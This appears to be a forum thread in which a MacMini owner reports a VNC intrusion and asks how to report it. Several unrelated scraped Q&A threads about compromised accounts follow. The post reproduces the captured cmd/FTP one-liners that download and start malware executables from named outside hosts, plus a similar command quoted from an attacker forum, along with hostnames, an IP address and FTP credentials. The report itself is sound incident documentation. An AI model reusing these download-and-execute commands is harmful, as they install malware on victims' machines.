MacMini running my TV has been compromised, tried to download winbackup.exe

I have a MacMini running Elgatos EyeTV software as my permanent HD TV setup. It's permanently hooked up to the internet and is always on. I have a Universal remote for controlling EyeTV, FrontRow and the rest of my Home Theater system. Until today I thought this may have been a problem with the remote.
Over the past few weeks it has been behaving erratically every now and then. The 'remote' dialog would appear on screen and it would change between channels. The video would keep switching between pause and play repeatedly. If I'm watching a movie in Front Row, it would do the same, but eventually switch all the way back out to the OS. It did cross my mind that maybe someone was getting into the computer, but I didn't see how this could be happening.
My Mac Mini is hooked up to an ADSL 2 modem, which I have setup with port mappings for port 80 and a non standard ssh port mapped to the Mini. These are the only ports open.
Today it happened again, but this time it was something quite disturbing. I was watching a movie in Front Row and it suddenly switched out back to the OS. My first response is to cover up the infra red ports on my remote, because I had thought maybe the remote was sending invalid signals. But when it got back to the OS, it renamed one of my hard disks. I sat there and watched it as the following text was entered one character at a time:
cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get winbackup16.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7winbackup16.exe 7exit
Based on a Google search killyourself.info looks like a bitorrent tracker. But I can actually ftp into ftp1.killyourselfinfo server using 'mysql' and 'database' as the username and password (taken from the text shown above). The ftp server contains the following files, "YouTube.Video.Downloader.2007-GameRevolution", "h.exe", "RLPack1_1__1_.16PersonalVersion.zip", "torrentfix32.exe", "winamp533_pro.exe", "winbackup16.exe", "winsys32.exe", "woo.zip", "wrar361.exe" and "YouTube.Video.Downloader.2007-GameRevolution.rar"
A search on winbackup.exe brings up dozens of spyware and worm references. Which is fine, I don't have windows installed on the mini, but it is on my MacBook Pro in Parallels. If this had have happened on there then I may have had a bigger problem.
So, someone somewhere is connecting into my MacMini and attempting to download and install a windows worm/virus. I think they're getting in via VNC because I've had a VNC Server running on there for the last few weeks to allow me to get in from my laptop.
The fact that it's executing windows commands means that it's probably automated and they must assume it's a windows box, which kind of rules out ssh and applescript based attacks. I've killed the VNC server now, but I don't see how they were able to get in in the first place.
I disabled all of the network ports in System Preferences and the commands stopped being executed. What I'd like to do is be able to look through any logs that may reveal what connections were made to the mini. If I can, I'd like to track down the bad guys.

I have a simpler explanation for the password thing. There isn't one set. Neither was my firewall running. I'm not sure at what point that was disabled, but I'm still not sure how the connection is getting through my ADSL modem (no port mapping for VNC). A quote from the HenWen manual seems appropriate here:
“All that is necessary for evil to triumph is for good men to do nothing...”
— Edmund Burke
And yes, I am in IT Security At least my MBP is locked down.
I couldn't get snort working the way the tutorials and manuals described, so I went with Wireshark (used to be called ethereal).
Any my honey pot was successful. This is now a confirmed VNC exploit.
I had everything turned off. Bluetooth, WiFi, Firewire. All my applications were shutdown with the exception of TextEdit, which was sitting there waiting for remote commands to be entered. VNC Server, which is what I assumed the attacker was exploiting and Wireshark, which was sitting there listening for network packets.
Interestingly, the ftp server is different this time. Here is the complete text of what was entered (non-printable characters aside):
5systemroot5\system32\cmd.exe
cmd /c echo open ftp.heh.pheer.info .. heh 7echo binary .. heh 7echo get heh.exe .. heh 7echo bye .. heh 7ftp -as;heh 7del heh 7start heh.exe 7exit
This was a bit different to last time. It's a different ftp server and files. I can connect to the ftp server, but the username isn't as obvious. I went with 'anonymous' and '[email protected]' and got in. On this FTP server there are only two files, "GOOGLE.exe" and "HEH.exe"
If I try and ping ftp.heh.pheer.info it resolves to mail.cppweb.com, which doesn't respond to a ping at all, but www.cppweb.com seems to be an ISP of some sort in 'Monroe, Wisconsin' (according to the front page). So chances are the attacker is a user of that ISP. It looks a bit dodgy, all of the internal links go to a 404 page.
Wireshark has a series of VNC requests coming in from the IP address 58.20.207.179, which I can't ping and doesn't come up with a name via nslookup. The IP address of both ftp.heh.pheer.info and mail.cppweb.com is: 64.73.102.119
This is a little more interesting; heh.pheer.info goes nowhere in the browser, but pheer.info resolves to www.ryan1918.com, which is apparently the number 1 source of everything. Looking at some of the posts on their front page it looks like they've been attacked a lot over the past few days, although based on some of the links and 'affiliates' it doesn't appear to be a reputable place, at least not at first glance (no offense meant to any members).
It's also pretty clear why they have been hacked so often. I tried searching for VNC in their forums and got an error, which revealed a nicely detailed SQL query showing the structure of their database. But their site can be searched via Google. Here's an interesting forum question under the topic of 'VNC Hacking':
can someone help me with uploading a file and executing after u get root access on a vnc server. ive been using windows ftp but doesnt seem to work on rooted box is there a easier was to do this or am i doing it wrong. Thanks in advance
cmd.exe /c echo open x.x.x.x > i &echo get winreg.exe >> i &echo quit >> i &ftp -As:i &start winreg.exe
http://www.ryan1918.com/viewtopic.php?p=40897&sid=aef6bf23561670b189ebfff1525064 b2
And here's a link someone posted to their 'vnc bot'
http://www.ryan1918.com/viewtopic.php?t=7573&sid=f5843eae2bdd6fdfcc396008e46a13f 9
I was going to submit a complaint to the IC3, but they seem to be focussed on actual monetary loss and fraud.
Can anyone suggest an appropriate way forward. I assume there must be some organisation that this information can be submitted to. Surely these kinds of attacks shouldn't simply be tolerated.

Similar Messages

  • I am trying to change my primary email address for it has been compromised. the email address I am trying to change it to is my rescue email address? how do I change my primary email address?

    I am trying to change my primary address for it has been compromised. The email address I am trying to change it to is my "rescue" email address. How do I change my primary email address to my rescue email address? can I delete my rescue email address so I can use it as my primary?

    You will have to delete your rescue email address first, then go back and change your primary.
    Source: http://support.apple.com/kb/ht5312
    You can edit or delete your rescue email address at My Apple ID. To edit your rescue email address:
    Navigate to My Apple ID using your web browser.
    Click "Manage your account"
    When prompted, sign in using your Apple ID and password.
    Click Password & Security
    You'll be asked to answer 2 of your 3 security questions before you can make any modifications. If you are unable to remember your answers, you can choose to send an email to your rescue email to reset your security questions.
    Note: The option to send an email to reset your security questions and answers will not be available if a rescue email address is not provided. You will need to contact iTunes Store support in order to do so. 

  • I think my account has been compromised. I just got a receipt for $10.69 today that I didn't spend. How do I get my money back?

    I think my account has been compromised. I just got a receipt for $10.69 today that I didn't spend. How do I get my money back?
    I've already submitted my problem to PayPal and they are investigating it. I need to get this reversed and my money back. It's hard enough saving for formula without some ******* buying **** with my information.
    Anyone else have this problem?

    It was a genuine email from iTunes, not a phishing attempt trying to get your account and payment details ?
    Viewing your account's purchase history : See your purchase history in the iTunes Store - Apple Support (on an iOS device you can view the last 90 days purchases via http://reportaproblem.apple.com)
    Phishing and similar emails : Phishing & Other Suspicious Emails
    Phishing emails : Identifying fraudulent "phishing" email - Apple Support
    Genuine iTunes emails : Identifying legitimate emails from the iTunes Store - Apple Support
    If it's a genuine email and it shows on your account's purchase history then contact iTunes Support : http://www.apple.com/support/itunes/contact/ - click on Contact iTunes Store Support on the right-hand side of the page, then Purchases, Billing & Redemption . And change your account's password e.g. by logging into it via the Store > View Account menu on your computer's iTunes, or via http://appleid.apple.com
    If it is a phishing email then forward it to Apple : [email protected] , and then delete it.

  • I got a text message which had a link attached to it, i did click on the link, basically some job scam but on the link. Now i just want to find out if my phone has been compromised in anyway and what are the tell tell signs.

    I got a text message which had a link attached to it, i did click on the link, basically some job scam but on the link. Now i just want to find out if my phone has been compromised in anyway and what are the tell tell signs.

    your phone has not been compromised.  There have been no viruses, worms or trojan horses ever reported.

  • I'm afraid my iPhone 4S might have a virus/be hacked.  Is this possible and if so, how can I find out if it has been compromised?

    I'm afraid my iPhone 4S has a virus or has been hacked.  Just in the last day or so my battery life gets used up a lot faster and I have all of a sudden started receiving a lot of spam email.   How can I find out if my phone has been compromised?

    Unless you left the iPhone in the possession of another person it could not be hacked...and unless it has been jailbroken it cannot get a virus.
    An email account can be hacked at the service provider's end...this has happened a number of times with gmail. 
    Do a reboot, hold both the power and home buttons until the apple logo appears and it restarts, ignoring the red slider if that appears.
    If that does not help the battery situation, make a backup of your content and then restore to factory condition, Settings > General > Reset > Erase All Content and Settings, and then restore from the backup you just made.
    Contact your email service provider and let them know you are getting material that could mean they have been hacked.

  • How to learn if the security on my 2009 macbook pro has been compromised?

    how to learn if the security on my 2009 macbook pro has been compromised?

    just my curiosity if there is a way to check this question out?

  • How long should I let the extracting process run? It has been over 6 hours (Photoshop Elements.

    How long should I let the extracting process run? It has been over 6 hours (Photoshop Elements). I have already received Disk Image Error - 4960. System will not let me attempt another download as message that download is in queue is received??

    Cancel it, try this:
    Direct Download Links for Adobe Software
    Use Winzip to extract the 7z file.
    Mylenium

  • HT1766 my email has been compromised by a worm, can my ipad be infected. I do not use a computer only the tablet. My aol account is the email address that is going out with the evil emails. Help.Please....

    Hi, my Ipad 2 address book has been compromised by a worm....sending out weird messages using my aol account. Any ideas how to get rid of this?

    My email was hacked twice in March.
    The only way to avoid the problem is to add two step verification on your email accounts. 
    It's a pain to set up, but it prevents anyone from signing in to your account on another device you don't authorize.
    This is not an iPad virus, it is an email hack....

  • My safari has been compromised by a malware infection

    My safari 5 has been compromised by a malware infection and I need to reinstall but it will not reinstall from install disc and will not install from internet, any ideas? My service provider has solved the problem from his end but safari will not allow me access to my mail.

    Uninstalling and reinstalling Safari won't rid the hard drive of malware.
    Read here > http://www.reedcorner.net/guides/macvirus/
    safari will not allow me access to my mail.
    This is why setting up web based mail via your Mac Mail app is a better way to go. That way if you can't access your mail via a browser, you can access it via Mac Mail.
    I'm going by your profile: v10.6.8. See if you can reinstall Safari from here >  Safari 5.1

  • TS1424 I believe the credit card online has been compromised and someone has purchased from iTunes without my permission. What can I do?

    What can I do if my credit card has been compromised and someone has used it to buy from the itunes Store?

    Wpgjets wrote:
    ... What does iTunes do to track the ones who steal CC numbers and use them to make iTunes purchases?
    What they do is up to them, but loss prevention may include suspending that Apple ID for purchases until such time the fraud is rectified. They may pursue the thief for chargebacks and fines from the issuing bank and take whatever other legal action they deem appropriate. In any event none of that involves you, presuming it's not your job to investigate criminal activity. As long as your payment method continues to be accepted by Apple, you don't have to do anything else.
    Changing your Apple ID password once in a while is a good idea though, and if Apple wants to compel you do so you will find out when you attempt to log in here or make a purchase. Be wary of "phishing" and never click on any links in an email that may appear to be from Apple, as authentic as it may seem. This is a popular way of stealing Apple IDs and all that it entails.

  • HT5622 Good day to advise you that I forgot security questions, email your questions to re-password security has been compromised by some persons illegitimate since the change

    Good day to advise you that I forgot security questions, email your questions to re-password security has been compromised by some persons illegitimate since the change.
    <E-mail Edited by Host>

    Apple does not respond here.  Do not put email addresses in posts here.  The world will see it.

  • My ipod classic has been stolen can anybody download my personal  photos from it

    my ipod classic has been stolen can anybody download my personal photos from it

    They can, but the images will only be the small thumbnail files that are created for optimized viewing on the iPod's smaller display.  That is unless you store the images on the iPod in their full resolution.
    B-rock

  • I am getting "an unknown error has occurred" when trying to download any free apps from my brand new 4GS iPhone

    I am getting "an unknown error has occurred" when trying to download any free apps from my brand new 4S iPhone.
    Please Help!!

    I had the exact same problem.  Worked fine for a couple days then suddenly getting this error.  I fixed it, however. 
    Do this:
    Open the App Store app on your phone.
    Go to the "Featured" section.
    Scroll to the very bottom of the page and click on your Apple ID.
    Screen pops up. Choose "Sign out".
    Scroll to the bottom of the "Featured" section again.
    Sign back in.
    Try your download again.
    This worked for me.  Good luck!

  • Firefox has been unsuccessfully attempting to download a software update for a few days now... What's the problem?

    Firefox has been unsuccessfully attempting to download a software update for a few days now... What’s the problem?

    If you have problems with updating then easiest is to download the full version and uninstall the currently installed version.<br />
    You may need to remove the Firefox program folder to do a clean install of the new version.
    Do a clean (re-)install:
    * Download a fresh Firefox copy and save the file to the desktop.
    * Firefox 4.0.x: http://www.mozilla.com/en-US/firefox/all.html
    * Uninstall your current Firefox version and remove the Firefox program folder before installing that copy of the Firefox installer.
    * Do not remove personal data if you uninstall the current version.
    * It is important to delete the Firefox program folder to remove all the files and make sure that there are no problems with files that were leftover after uninstalling.
    Your bookmarks and other profile data are stored elsewhere in the [http://kb.mozillazine.org/Profile_folder_-_Firefox Firefox Profile Folder] and won't be affected by a reinstall, but make sure that you do not select to remove personal data if you uninstall Firefox.

  • Hi can anyone tell me if this is normal, my computer has been extracting a abode download all night?

    Hi can anyone tell me if this is normal, my computer has been extracting an adobe download all night???? and it has cost me $60 in pre paid internet already, i hope it is going to work!!!

    Where did you choose to download the install files too?

Maybe you are looking for